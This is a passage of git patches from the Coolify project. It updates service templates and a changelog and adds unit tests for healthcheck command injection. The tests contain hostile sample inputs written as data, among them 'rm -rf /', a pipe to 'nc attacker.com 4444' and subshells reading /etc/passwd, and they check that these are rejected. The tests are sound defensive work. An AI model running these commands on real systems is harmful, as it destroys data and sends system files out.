+        "compose": "c2VydmljZXM6CiAgZGF0YWJhc3VzOgogICAgaW1hZ2U6ICdkYXRhYmFzdXMvZGF0YWJhc3VzOnYzLjE2LjInCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fREFUQUJBU1VTXzQwMDUKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2RhdGFiYXN1cy1kYXRhOi9kYXRhYmFzdXMtZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLXFPLScKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjQwMDUvYXBpL3YxL3N5c3RlbS9oZWFsdGgnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "postgres",
             "mysql",
@@ -1951,7 +1951,7 @@
     "heyform": {
         "documentation": "https://docs.heyform.net/open-source/self-hosting?utm_source=coolify.io",
         "slogan": "Allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls. No coding skills required.",
-        "compose": "c2VydmljZXM6CiAgaGV5Zm9ybToKICAgIGltYWdlOiAnaGV5Zm9ybS9jb21tdW5pdHktZWRpdGlvbjpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWFzc2V0czovYXBwL3N0YXRpYy91cGxvYWQnCiAgICBkZXBlbmRzX29uOgogICAgICBtb25nbzoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBrZXlkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0hFWUZPUk1fODAwMAogICAgICAtICdBUFBfSE9NRVBBR0VfVVJMPSR7U0VSVklDRV9GUUROX0hFWUZPUk19JwogICAgICAtICdTRVNTSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0XzY0X1NFU1NJT059JwogICAgICAtICdGT1JNX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9CQVNFNjRfNjRfRk9STX0nCiAgICAgIC0gJ01PTkdPX1VSST1tb25nb2RiOi8vbW9uZ286MjcwMTcvaGV5Zm9ybScKICAgICAgLSBSRURJU19IT1NUPWtleWRiCiAgICAgIC0gUkVESVNfUE9SVD02Mzc5CiAgICAgIC0gJ1JFRElTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjgwMDAgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMwogIG1vbmdvOgogICAgaW1hZ2U6ICdwZXJjb25hL3BlcmNvbmEtc2VydmVyLW1vbmdvZGI6bGF0ZXN0JwogICAgdm9sdW1lczoKICAgICAgLSAnaGV5Zm9ybS1tb25nby1kYXRhOi9kYXRhL2RiJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICJlY2hvICdvaycgPiAvZGV2L251bGwgMj4mMSIKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMKICBrZXlkYjoKICAgIGltYWdlOiAnZXFhbHBoYS9rZXlkYjpsYXRlc3QnCiAgICBjb21tYW5kOiAna2V5ZGItc2VydmVyIC0tYXBwZW5kb25seSB5ZXMnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnS0VZREJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0tFWURCfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hleWZvcm0ta2V5ZGItZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSBrZXlkYi1jbGkKICAgICAgICAtICctLXBhc3MnCiAgICAgICAgLSAnJHtTRVJWSUNFX1BBU1NXT1JEX0tFWURCfScKICAgICAgICAtIHBpbmcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMK",
+        "compose": "c2VydmljZXM6CiAgaGV5Zm9ybToKICAgIGltYWdlOiAnaGV5Zm9ybS9jb21tdW5pdHktZWRpdGlvbjpsYXRlc3QnCiAgICB2b2x1bWVzOgogICAgICAtICdoZXlmb3JtLWFzc2V0czovYXBwL3N0YXRpYy91cGxvYWQnCiAgICBkZXBlbmRzX29uOgogICAgICBtb25nbzoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBrZXlkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0hFWUZPUk1fOTE1NwogICAgICAtICdBUFBfSE9NRVBBR0VfVVJMPSR7U0VSVklDRV9GUUROX0hFWUZPUk19JwogICAgICAtICdTRVNTSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0XzY0X1NFU1NJT059JwogICAgICAtICdGT1JNX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9CQVNFNjRfNjRfRk9STX0nCiAgICAgIC0gJ01PTkdPX1VSST1tb25nb2RiOi8vbW9uZ286MjcwMTcvaGV5Zm9ybScKICAgICAgLSBSRURJU19IT1NUPWtleWRiCiAgICAgIC0gUkVESVNfUE9SVD02Mzc5CiAgICAgIC0gJ1JFRElTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9LRVlEQn0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLXFPLSBodHRwOi8vMTI3LjAuMC4xOjkxNTcgfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogMwogIG1vbmdvOgogICAgaW1hZ2U6ICdwZXJjb25hL3BlcmNvbmEtc2VydmVyLW1vbmdvZGI6bGF0ZXN0JwogICAgdm9sdW1lczoKICAgICAgLSAnaGV5Zm9ybS1tb25nby1kYXRhOi9kYXRhL2RiJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICJlY2hvICdvaycgPiAvZGV2L251bGwgMj4mMSIKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMKICBrZXlkYjoKICAgIGltYWdlOiAnZXFhbHBoYS9rZXlkYjpsYXRlc3QnCiAgICBjb21tYW5kOiAna2V5ZGItc2VydmVyIC0tYXBwZW5kb25seSB5ZXMnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnS0VZREJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0tFWURCfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2hleWZvcm0ta2V5ZGItZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSBrZXlkYi1jbGkKICAgICAgICAtICctLXBhc3MnCiAgICAgICAgLSAnJHtTRVJWSUNFX1BBU1NXT1JEX0tFWURCfScKICAgICAgICAtIHBpbmcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMK",
         "tags": [
             "form",
             "builder",
@@ -1965,7 +1965,7 @@
         "category": "productivity",
         "logo": "svgs/heyform.svg",
         "minversion": "0.0.0",
-        "port": "8000"
+        "port": "9157"
     },
     "homarr": {
         "documentation": "https://homarr.dev?utm_source=coolify.io",
@@ -2041,6 +2041,21 @@
         "minversion": "0.0.0",
         "port": "80"
     },
+    "imgcompress": {
+        "documentation": "https://imgcompress.karimzouine.com?utm_source=coolify.io",
+        "slogan": "Offline image compression, conversion, and AI background removal for Docker homelabs.",
+        "compose": "c2VydmljZXM6CiAgaW1nY29tcHJlc3M6CiAgICBpbWFnZTogJ2thcmltejEvaW1nY29tcHJlc3M6MC42LjAnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fSU1HQ09NUFJFU1NfNTAwMAogICAgICAtICdESVNBQkxFX0xPR089JHtESVNBQkxFX0xPR086LWZhbHNlfScKICAgICAgLSAnRElTQUJMRV9TVE9SQUdFX01BTkFHRU1FTlQ9JHtESVNBQkxFX1NUT1JBR0VfTUFOQUdFTUVOVDotZmFsc2V9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjUwMDAnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMK",
+        "tags": [
+            "compress",
+            "photo",
+            "server",
+            "metadata"
+        ],
+        "category": "media",
+        "logo": "svgs/imgcompress.png",
+        "minversion": "0.0.0",
+        "port": "5000"
+    },
     "immich": {
         "documentation": "https://immich.app/docs/overview/introduction?utm_source=coolify.io",
         "slogan": "Self-hosted photo and video management solution.",
@@ -2417,6 +2432,19 @@
         "minversion": "0.0.0",
         "port": "3000"
     },
+    "librespeed": {
+        "documentation": "https://github.com/librespeed/speedtest?utm_source=coolify.io",
+        "slogan": "Self-hosted lightweight Speed Test.",
+        "compose": "c2VydmljZXM6CiAgbGlicmVzcGVlZDoKICAgIGNvbnRhaW5lcl9uYW1lOiBsaWJyZXNwZWVkCiAgICBpbWFnZTogJ2doY3IuaW8vbGlicmVzcGVlZC9zcGVlZHRlc3Q6bGF0ZXN0JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0xJQlJFU1BFRURfODIKICAgICAgLSBNT0RFPXN0YW5kYWxvbmUKICAgICAgLSBURUxFTUVUUlk9ZmFsc2UKICAgICAgLSBESVNUQU5DRT1rbQogICAgICAtIFdFQlBPUlQ9ODIKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnY3VybCAxMjcuMC4wLjE6ODIgfHwgZXhpdCAxJwogICAgICB0aW1lb3V0OiAxcwogICAgICBpbnRlcnZhbDogMW0wcwogICAgICByZXRyaWVzOiAxCg==",
+        "tags": [
+            "speedtest",
+            "internet-speed"
+        ],
+        "category": "devtools",
+        "logo": "svgs/librespeed.png",
+        "minversion": "0.0.0",
+        "port": "82"
+    },
     "libretranslate": {
         "documentation": "https://libretranslate.com/docs/?utm_source=coolify.io",
         "slogan": "Free and open-source machine translation API, entirely self-hosted.",
@@ -4099,7 +4127,7 @@
     "seaweedfs": {
         "documentation": "https://github.com/seaweedfs/seaweedfs?utm_source=coolify.io",
         "slogan": "SeaweedFS is a simple and highly scalable distributed file system. Compatible with S3, with an admin web interface.",
-        "compose": "c2VydmljZXM6CiAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjA1JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX1MzXzgzMzMKICAgICAgLSAnQVdTX0FDQ0VTU19LRVlfSUQ9JHtTRVJWSUNFX1VTRVJfUzN9JwogICAgICAtICdBV1NfU0VDUkVUX0FDQ0VTU19LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX1MzfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3NlYXdlZWRmcy1zMy1kYXRhOi9kYXRhJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9iYXNlLWNvbmZpZy5qc29uCiAgICAgICAgdGFyZ2V0OiAvYmFzZS1jb25maWcuanNvbgogICAgICAgIGNvbnRlbnQ6ICJ7XG4gIFwiaWRlbnRpdGllc1wiOiBbXG4gICAge1xuICAgICAgXCJuYW1lXCI6IFwiYW5vbnltb3VzXCIsXG4gICAgICBcImFjdGlvbnNcIjogW1xuICAgICAgICBcIlJlYWRcIlxuICAgICAgXVxuICAgIH0sXG4gICAge1xuICAgICAgXCJuYW1lXCI6IFwiYWRtaW5cIixcbiAgICAgIFwiY3JlZGVudGlhbHNcIjogW1xuICAgICAgICB7XG4gICAgICAgICAgXCJhY2Nlc3NLZXlcIjogXCJlbnY6QVdTX0FDQ0VTU19LRVlfSURcIixcbiAgICAgICAgICBcInNlY3JldEtleVwiOiBcImVudjpBV1NfU0VDUkVUX0FDQ0VTU19LRVlcIlxuICAgICAgICB9XG4gICAgICBdLFxuICAgICAgXCJhY3Rpb25zXCI6IFtcbiAgICAgICAgXCJBZG1pblwiLFxuICAgICAgICBcIlJlYWRcIixcbiAgICAgICAgXCJSZWFkQWNwXCIsXG4gICAgICAgIFwiTGlzdFwiLFxuICAgICAgICBcIlRhZ2dpbmdcIixcbiAgICAgICAgXCJXcml0ZVwiLFxuICAgICAgICBcIldyaXRlQWNwXCJcbiAgICAgIF1cbiAgICB9XG4gIF1cbn1cbiIKICAgIGVudHJ5cG9pbnQ6ICJzaCAtYyAnXFxcbnNlZCBcInMvZW52OkFXU19BQ0NFU1NfS0VZX0lELyRBV1NfQUNDRVNTX0tFWV9JRC9nXCIgL2Jhc2UtY29uZmlnLmpzb24gPiAvYmFzZTEtY29uZmlnLmpzb247IFxcXG5zZWQgXCJzL2VudjpBV1NfU0VDUkVUX0FDQ0VTU19LRVkvJEFXU19TRUNSRVRfQUNDRVNTX0tFWS9nXCIgL2Jhc2UxLWNvbmZpZy5qc29uID4gL2NvbmZpZy5qc29uOyBcXFxud2VlZCBzZXJ2ZXIgLWRpcj0vZGF0YSAtbWFzdGVyLnBvcnQ9OTMzMyAtczMgLXMzLnBvcnQ9ODMzMyAtczMuY29uZmlnPS9jb25maWcuanNvblxcXG4nXG4iCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLS1zcGlkZXIgLXEgaHR0cDovLzAuMC4wLjA6ODMzMzsgWyAkJD8gLWxlIDggXScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHNlYXdlZWRmcy1hZG1pbjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjA1JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0FETUlOXzIzNjQ2CiAgICAgIC0gJ1NFQVdFRURfVVNFUl9BRE1JTj0ke1NFUlZJQ0VfVVNFUl9BRE1JTn0nCiAgICAgIC0gJ1NFQVdFRURfUEFTU1dPUkRfQURNSU49JHtTRVJWSUNFX1BBU1NXT1JEX0FETUlOfScKICAgIGNvbW1hbmQ6CiAgICAgIC0gYWRtaW4KICAgICAgLSAnLW1hc3Rlcj1zZWF3ZWVkZnMtbWFzdGVyOjkzMzMnCiAgICAgIC0gJy1hZG1pblVzZXI9JHtTRUFXRUVEX1VTRVJfQURNSU59JwogICAgICAtICctYWRtaW5QYXNzd29yZD0ke1NFQVdFRURfUEFTU1dPUkRfQURNSU59JwogICAgICAtICctcG9ydD0yMzY0NicKICAgICAgLSAnLWRhdGFEaXI9L2RhdGEnCiAgICB2b2x1bWVzOgogICAgICAtICdzZWF3ZWVkZnMtYWRtaW4tZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtLXNwaWRlciAtcSBodHRwOi8vMC4wLjAuMDoyMzY0NjsgWyAkJD8gLWxlIDggXScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQo=",
+        "compose": "c2VydmljZXM6CiAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX1MzXzgzMzMKICAgICAgLSAnQVdTX0FDQ0VTU19LRVlfSUQ9JHtTRVJWSUNFX1VTRVJfUzN9JwogICAgICAtICdBV1NfU0VDUkVUX0FDQ0VTU19LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX1MzfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3NlYXdlZWRmcy1zMy1kYXRhOi9kYXRhJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9iYXNlLWNvbmZpZy5qc29uCiAgICAgICAgdGFyZ2V0OiAvYmFzZS1jb25maWcuanNvbgogICAgICAgIGNvbnRlbnQ6ICJ7XG4gIFwiaWRlbnRpdGllc1wiOiBbXG4gICAge1xuICAgICAgXCJuYW1lXCI6IFwiYW5vbnltb3VzXCIsXG4gICAgICBcImFjdGlvbnNcIjogW1xuICAgICAgICBcIlJlYWRcIlxuICAgICAgXVxuICAgIH0sXG4gICAge1xuICAgICAgXCJuYW1lXCI6IFwiYWRtaW5cIixcbiAgICAgIFwiY3JlZGVudGlhbHNcIjogW1xuICAgICAgICB7XG4gICAgICAgICAgXCJhY2Nlc3NLZXlcIjogXCJlbnY6QVdTX0FDQ0VTU19LRVlfSURcIixcbiAgICAgICAgICBcInNlY3JldEtleVwiOiBcImVudjpBV1NfU0VDUkVUX0FDQ0VTU19LRVlcIlxuICAgICAgICB9XG4gICAgICBdLFxuICAgICAgXCJhY3Rpb25zXCI6IFtcbiAgICAgICAgXCJBZG1pblwiLFxuICAgICAgICBcIlJlYWRcIixcbiAgICAgICAgXCJSZWFkQWNwXCIsXG4gICAgICAgIFwiTGlzdFwiLFxuICAgICAgICBcIlRhZ2dpbmdcIixcbiAgICAgICAgXCJXcml0ZVwiLFxuICAgICAgICBcIldyaXRlQWNwXCJcbiAgICAgIF1cbiAgICB9XG4gIF1cbn1cbiIKICAgIGVudHJ5cG9pbnQ6ICJzaCAtYyAnXFxcbnNlZCBcInMvZW52OkFXU19BQ0NFU1NfS0VZX0lELyRBV1NfQUNDRVNTX0tFWV9JRC9nXCIgL2Jhc2UtY29uZmlnLmpzb24gPiAvYmFzZTEtY29uZmlnLmpzb247IFxcXG5zZWQgXCJzL2VudjpBV1NfU0VDUkVUX0FDQ0VTU19LRVkvJEFXU19TRUNSRVRfQUNDRVNTX0tFWS9nXCIgL2Jhc2UxLWNvbmZpZy5qc29uID4gL2NvbmZpZy5qc29uOyBcXFxud2VlZCBzZXJ2ZXIgLWRpcj0vZGF0YSAtbWFzdGVyLnBvcnQ9OTMzMyAtczMgLXMzLnBvcnQ9ODMzMyAtczMuY29uZmlnPS9jb25maWcuanNvblxcXG4nXG4iCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3dnZXQgLS1zcGlkZXIgLXEgaHR0cDovLzAuMC4wLjA6ODMzMzsgWyAkJD8gLWxlIDggXScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogIHNlYXdlZWRmcy1hZG1pbjoKICAgIGltYWdlOiAnY2hyaXNsdXNmL3NlYXdlZWRmczo0LjEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0FETUlOXzIzNjQ2CiAgICAgIC0gJ1NFQVdFRURfVVNFUl9BRE1JTj0ke1NFUlZJQ0VfVVNFUl9BRE1JTn0nCiAgICAgIC0gJ1NFQVdFRURfUEFTU1dPUkRfQURNSU49JHtTRVJWSUNFX1BBU1NXT1JEX0FETUlOfScKICAgIGNvbW1hbmQ6CiAgICAgIC0gYWRtaW4KICAgICAgLSAnLW1hc3Rlcj1zZWF3ZWVkZnMtbWFzdGVyOjkzMzMnCiAgICAgIC0gJy1hZG1pblVzZXI9JHtTRUFXRUVEX1VTRVJfQURNSU59JwogICAgICAtICctYWRtaW5QYXNzd29yZD0ke1NFQVdFRURfUEFTU1dPUkRfQURNSU59JwogICAgICAtICctcG9ydD0yMzY0NicKICAgICAgLSAnLWRhdGFEaXI9L2RhdGEnCiAgICB2b2x1bWVzOgogICAgICAtICdzZWF3ZWVkZnMtYWRtaW4tZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtLXNwaWRlciAtcSBodHRwOi8vMC4wLjAuMDoyMzY0NjsgWyAkJD8gLWxlIDggXScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgc2Vhd2VlZGZzLW1hc3RlcjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQo=",
         "tags": [
             "object",
             "storage",
diff --git a/tests/Unit/HealthCheckCommandInjectionTest.php b/tests/Unit/HealthCheckCommandInjectionTest.php
index 534be700a..88361c3d9 100644
--- a/tests/Unit/HealthCheckCommandInjectionTest.php
+++ b/tests/Unit/HealthCheckCommandInjectionTest.php
@@ -5,6 +5,9 @@
 use App\Models\ApplicationDeploymentQueue;
 use App\Models\ApplicationSetting;
 use Illuminate\Support\Facades\Validator;
+use Tests\TestCase;
+
+uses(TestCase::class);
 
 beforeEach(function () {
     Mockery::close();
@@ -176,11 +179,11 @@
 it('strips newlines from CMD healthcheck command', function () {
     $result = callGenerateHealthcheckCommands([
         'health_check_type' => 'cmd',
-        'health_check_command' => "redis-cli ping\n&& echo pwned",
+        'health_check_command' => "redis-cli\nping",
     ]);
 
     expect($result)->not->toContain("\n")
-        ->and($result)->toBe('redis-cli ping && echo pwned');
+        ->and($result)->toBe('redis-cli ping');
 });
 
 it('falls back to HTTP healthcheck when CMD type has empty command', function () {
@@ -193,6 +196,68 @@
     expect($result)->toContain('curl -s -X');
 });
 
+it('falls back to HTTP healthcheck when CMD command contains shell metacharacters', function () {
+    $result = callGenerateHealthcheckCommands([
+        'health_check_type' => 'cmd',
+        'health_check_command' => 'curl localhost; rm -rf /',
+    ]);
+
+    // Semicolons are blocked by runtime regex — falls back to HTTP healthcheck
+    expect($result)->toContain('curl -s -X')
+        ->and($result)->not->toContain('rm -rf');
+});
+
+it('falls back to HTTP healthcheck when CMD command contains pipe operator', function () {
+    $result = callGenerateHealthcheckCommands([
+        'health_check_type' => 'cmd',
+        'health_check_command' => 'echo test | nc attacker.com 4444',
+    ]);
+
+    expect($result)->toContain('curl -s -X')
+        ->and($result)->not->toContain('nc attacker.com');
+});
+
+it('falls back to HTTP healthcheck when CMD command contains subshell', function () {
+    $result = callGenerateHealthcheckCommands([
+        'health_check_type' => 'cmd',
+        'health_check_command' => 'curl $(cat /etc/passwd)',
+    ]);
+
+    expect($result)->toContain('curl -s -X')
+        ->and($result)->not->toContain('/etc/passwd');
+});
+
+it('falls back to HTTP healthcheck when CMD command exceeds 1000 characters', function () {
+    $result = callGenerateHealthcheckCommands([
+        'health_check_type' => 'cmd',
+        'health_check_command' => str_repeat('a', 1001),
+    ]);
+
+    // Exceeds max length — falls back to HTTP healthcheck
+    expect($result)->toContain('curl -s -X');
+});
+
+it('falls back to HTTP healthcheck when CMD command contains backticks', function () {
+    $result = callGenerateHealthcheckCommands([
+        'health_check_type' => 'cmd',
+        'health_check_command' => 'curl `cat /etc/passwd`',
+    ]);
+
+    expect($result)->toContain('curl -s -X')
+        ->and($result)->not->toContain('/etc/passwd');
+});
+
+it('uses sanitized method in full_healthcheck_url display', function () {
+    $result = callGenerateHealthcheckCommands([
+        'health_check_method' => 'INVALID;evil',
+        'health_check_host' => 'localhost',
+    ]);
+
+    // Method should be sanitized to 'GET' (default) in both command and display
+    expect($result)->toContain("'GET'")
+        ->and($result)->not->toContain('evil');
+});
+
 it('validates healthCheckCommand rejects strings over 1000 characters', function () {
     $rules = [
         'healthCheckCommand' => 'nullable|string|max:1000',
@@ -253,15 +318,20 @@ function callGenerateHealthcheckCommands(array $overrides = []): string
     $application->shouldReceive('getAttribute')->with('settings')->andReturn($settings);
 
     $deploymentQueue = Mockery::mock(ApplicationDeploymentQueue::class)->makePartial();
+    $deploymentQueue->shouldReceive('addLogEntry')->andReturnNull();
 
     $job = Mockery::mock(ApplicationDeploymentJob::class)->makePartial();
 
-    $reflection = new ReflectionClass($job);
+    $reflection = new ReflectionClass(ApplicationDeploymentJob::class);
 
     $appProp = $reflection->getProperty('application');
     $appProp->setAccessible(true);
     $appProp->setValue($job, $application);
 
+    $queueProp = $reflection->getProperty('application_deployment_queue');
+    $queueProp->setAccessible(true);
+    $queueProp->setValue($job, $deploymentQueue);
+
     $method = $reflection->getMethod('generate_healthcheck_commands');
     $method->setAccessible(true);
 

From c4279a6bcb008a05cb8934c77045e0f5a571a95d Mon Sep 17 00:00:00 2001
From: Taras Machyshyn <tmachyshyn@users.noreply.github.com>
Date: Mon, 16 Mar 2026 18:23:47 +0200
Subject: [PATCH 077/213] Define static versions

---
 templates/compose/espocrm.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/templates/compose/espocrm.yaml b/templates/compose/espocrm.yaml
index 130562a78..6fec260c4 100644
--- a/templates/compose/espocrm.yaml
+++ b/templates/compose/espocrm.yaml
@@ -7,7 +7,7 @@
 
 services:
   espocrm:
-    image: espocrm/espocrm:latest
+    image: espocrm/espocrm:9
     environment:
       - SERVICE_URL_ESPOCRM
       - ESPOCRM_ADMIN_USERNAME=${ESPOCRM_ADMIN_USERNAME:-admin}
@@ -31,7 +31,7 @@ services:
         condition: service_healthy
 
   espocrm-daemon:
-    image: espocrm/espocrm:latest
+    image: espocrm/espocrm:9
     container_name: espocrm-daemon
     volumes:
       - espocrm:/var/www/html
@@ -42,7 +42,7 @@ services:
         condition: service_healthy
 
   espocrm-websocket:
-    image: espocrm/espocrm:latest
+    image: espocrm/espocrm:9
     container_name: espocrm-websocket
     environment:
       - SERVICE_URL_ESPOCRM_WEBSOCKET_8080
@@ -59,7 +59,7 @@ services:
         condition: service_healthy
 
   espocrm-db:
-    image: mariadb:latest
+    image: mariadb:11.8
     environment:
       - MARIADB_DATABASE=${MARIADB_DATABASE:-espocrm}
       - MARIADB_USER=${SERVICE_USER_MARIADB}

From 82b4a2b6b00e1672aabc3491ec6a614062dd3067 Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <github-actions[bot]@users.noreply.github.com>
Date: Mon, 16 Mar 2026 16:51:52 +0000
Subject: [PATCH 078/213] docs: update changelog

---
 CHANGELOG.md | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 45cbd48d2..999af79b8 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1285,6 +1285,9 @@ ### 🚀 Features
 - *(compose-preview)* Populate fqdn from docker_compose_domains (#8963)
 - *(server)* Auto-fetch server metadata after validation
 - *(server)* Auto-fetch server metadata after validation (#8964)
+- *(templates)* Add imgcompress service, for offline image processing (#8763)
+- *(service)* Add librespeed (#8626)
+- *(service)* Update databasus to v3.16.2 (#8586)
 
 ### 🐛 Bug Fixes
 
@@ -4681,6 +4684,9 @@ ### 🐛 Bug Fixes
 - *(api)* Allow is_container_label_escape_enabled in service operations (#8955)
 - *(docker-compose)* Respect preserveRepository when injecting --project-directory
 - *(docker-compose)* Respect preserveRepository when injecting --project-directory (#8956)
+- *(compose)* Include git branch in compose file not found error
+- *(template)* Fix heyform template
+- *(template)* Fix heyform template (#8747)
 
 ### 💼 Other
 
@@ -5937,6 +5943,7 @@ ### 📚 Documentation
 - *(readme)* Add VPSDime to Big Sponsors list
 - *(readme)* Move MVPS to Huge Sponsors section
 - *(settings)* Clarify Do Not Track helper text
+- Update changelog
 
 ### ⚡ Performance
 
@@ -6775,6 +6782,10 @@ ### ⚙️ Miscellaneous Tasks
 - Prepare for PR
 - Prepare for PR
 - *(service)* Pin castopod service to a static version instead of latest
+- *(service)* Remove unused attributes on imgcompress service
+- *(service)* Pin imgcompress to a static version instead of latest
+- *(service)* Update SeaweedFS images to version 4.13 (#8738)
+- *(templates)* Bump databasus image version
 
 ### ◀️ Revert
 

From 15d6de9f41b9f324f4144671044b6614d461ff9c Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 16 Mar 2026 21:10:00 +0100
Subject: [PATCH 079/213] fix(storages): hide PR suffix for services and fix
 instantSave logic

- Restrict "Add suffix for PR deployments" checkbox to non-service
